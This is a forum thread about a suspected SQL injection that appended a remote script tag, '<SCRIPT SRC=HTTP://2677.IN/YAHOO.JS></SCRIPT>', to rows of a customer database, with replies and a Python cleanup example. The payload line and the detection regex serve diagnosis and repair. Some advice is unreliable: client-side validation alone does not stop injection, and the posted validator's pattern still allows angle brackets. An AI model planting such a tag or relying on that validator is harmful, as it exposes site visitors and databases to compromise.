
possible attack on my SQL server 2005 DB?

newbie27 asked:
Hello Experts,
I have found a strange block of JavaScript appended to one of the customer table fields in my database.
The script looks something like this:
<SCRIPT SRC=HTTP://2677.IN/YAHOO.JS></SCRIPT>
And I found this in almost every row of the 1123200 records in the table.
I don't understand how this got added, but this seems to have happened only today.
Please can someone advise if this makes sense? Is it possible for someone to update a database field which I have saved and secured on my dedicated server hosting?
Your help would greatly be appreciated.
Thanks
Sam

Top Expert 2015

Commented:
Sounds like a SQL injection attack. Are you using form fields or URL parameters on the site?

Author

Commented:
Yes, I have got the registration pages where I accept data from the customers using form fields...

How can I stop this happening again? Please advise.

Thanks
Top Expert 2015
Commented:
You need to remove all symbols and entities from the text submitted before processing to prevent scripts from being accepted. Don't allow symbols like &, <, >, #, |, %, etc. to make it past the first sub during postback.
Top Expert 2015

Commented:
...or validate the form data on the client end and prevent symbols from being entered in the first place.
Hi,
Try something like this on the client end to make sure you only accept the valid characters; it depends on your need, of course.

<%-- Rejects the postback if txtUserName contains any character outside the allowed set --%>
<asp:RegularExpressionValidator ID="RegularExpressionValidator8" runat="server"
    ErrorMessage="" Display="Dynamic" Text="<br/>Invalid character entered"
    ControlToValidate="txtUserName"
    ValidationExpression="^[ \r\na-zA-Z0-9@~#;.!)(:,£$%^&*'_+={\[}\]?/\\><|\-&quot;]*$" />

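Before the validator goes in, the affected rows still have to be found and cleaned, and the clean-up itself should use bound parameters so it cannot become a second injection point. The following is an added example, not code from this thread or from the asker's site; it uses Python's sqlite3 as a stand-in for the SQL Server 2005 database, the `customers` table, its columns and the `_check_identifier` helper are assumptions, and the rows are constructed sample data carrying the tag quoted in the question.

```python
import re
import sqlite3

# The injected element seen in the question: a <script src=...></script> tag
# appended to the end of a text field. Case-insensitive, tolerates quoted src.
INJECTED_SCRIPT = re.compile(
    r"<script\s+src=['\"]?[^'\">]+['\"]?\s*>\s*</script>\s*$", re.IGNORECASE
)
_IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def _check_identifier(name):
    """Table/column names cannot be bound parameters, so allow-list them instead."""
    if not _IDENTIFIER.match(name):
        raise ValueError(f"refusing unsafe identifier: {name!r}")
    return name


def build_sample_db():
    """Constructed rows standing in for the customers table (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, city TEXT)")
    tag = "<SCRIPT SRC=HTTP://2677.IN/YAHOO.JS></SCRIPT>"
    rows = [
        (1, "Alice Example" + tag, "Leeds" + tag),
        (2, "Bob O'Brien" + tag, "York"),
        (3, "Carol <b>Example</b>", "Hull"),  # legitimate markup: must be left alone
        (4, "Dave Example", "Bath"),
    ]
    conn.executemany("INSERT INTO customers VALUES (?, ?, ?)", rows)
    conn.commit()
    return conn


def find_injected_rows(conn, table, column):
    """Return ids of rows whose column carries the appended script tag."""
    table, column = _check_identifier(table), _check_identifier(column)
    # Coarse filter in SQL with a bound value; the precise match is done in Python.
    cur = conn.execute(
        f"SELECT id, {column} FROM {table} WHERE {column} LIKE ? ORDER BY id", ("%<script%",)
    )
    return [(row_id, value) for row_id, value in cur if value and INJECTED_SCRIPT.search(value)]


def clean_column(conn, table, column):
    """Strip the injected tag from every affected row; returns the number of rows fixed."""
    hits = find_injected_rows(conn, table, column)
    for row_id, value in hits:
        conn.execute(
            f"UPDATE {table} SET {column} = ? WHERE id = ?", (INJECTED_SCRIPT.sub("", value), row_id)
        )
    conn.commit()
    return len(hits)
```

Run the finder per text column first to size the incident (which tables and columns, how many rows), then clean; on SQL Server the same two statements are issued through parameterised commands rather than string concatenation.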